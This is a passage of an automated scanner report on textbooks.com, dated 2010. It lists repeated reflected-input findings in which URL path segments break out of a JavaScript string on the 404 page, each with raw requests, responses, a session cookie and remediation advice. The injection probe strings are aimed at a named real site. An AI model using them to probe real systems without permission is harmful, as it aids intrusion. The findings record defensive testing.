Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3636
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:52:06 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/BooksDescription.php1b6b9';8382c7dc55e'

</script>
...[SNIP]...

1.4. http://www.textbooks.com/BuyBack-Search.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /BuyBack-Search.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 320c7'%3b68ef252aca3 was submitted in the REST URL parameter 1. This input was echoed as 320c7';68ef252aca3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /BuyBack-Search.php320c7'%3b68ef252aca3 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3634
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:14 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...

   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/BuyBack-Search.php320c7';68ef252aca3'

</script>
...[SNIP]...

1.5. http://www.textbooks.com/Cart.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Cart.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46598'%3ba7b0f4f3bbd was submitted in the REST URL parameter 1. This input was echoed as 46598';a7b0f4f3bbd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Cart.php46598'%3ba7b0f4f3bbd HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3624
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:52:10 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
hReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Cart.php46598';a7b0f4f3bbd'

</script>
...[SNIP]...

1.6. http://www.textbooks.com/Catalog/A/Agriculture-and-Animal-Sciences.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/A/Agriculture-and-Animal-Sciences.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31e9d'%3b4ecbefbb6df was submitted in the REST URL parameter 1. This input was echoed as 31e9d';4ecbefbb6df in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog31e9d'%3b4ecbefbb6df/A/Agriculture-and-Animal-Sciences.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3661
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:52:52 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog31e9d';4ecbefbb6df/A/Agriculture-and-Animal-Sciences.php'

</script>
...[SNIP]...

1.7. http://www.textbooks.com/Catalog/A/Agriculture-and-Animal-Sciences.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/A/Agriculture-and-Animal-Sciences.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6e79'%3b1bcf40fced7 was submitted in the REST URL parameter 3. This input was echoed as f6e79';1bcf40fced7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/A/f6e79'%3b1bcf40fced7 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:52:53 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/A/f6e79';1bcf40fced7'

</script>
...[SNIP]...

1.8. http://www.textbooks.com/Catalog/B/Business-and-Economics.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/B/Business-and-Economics.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7739'%3bbb127e79e67 was submitted in the REST URL parameter 1. This input was echoed as d7739';bb127e79e67 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalogd7739'%3bbb127e79e67/B/Business-and-Economics.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3652
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:06 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalogd7739';bb127e79e67/B/Business-and-Economics.php'

</script>
...[SNIP]...

1.9. http://www.textbooks.com/Catalog/B/Business-and-Economics.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/B/Business-and-Economics.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce618'%3be2864f06855 was submitted in the REST URL parameter 3. This input was echoed as ce618';e2864f06855 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/B/ce618'%3be2864f06855 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
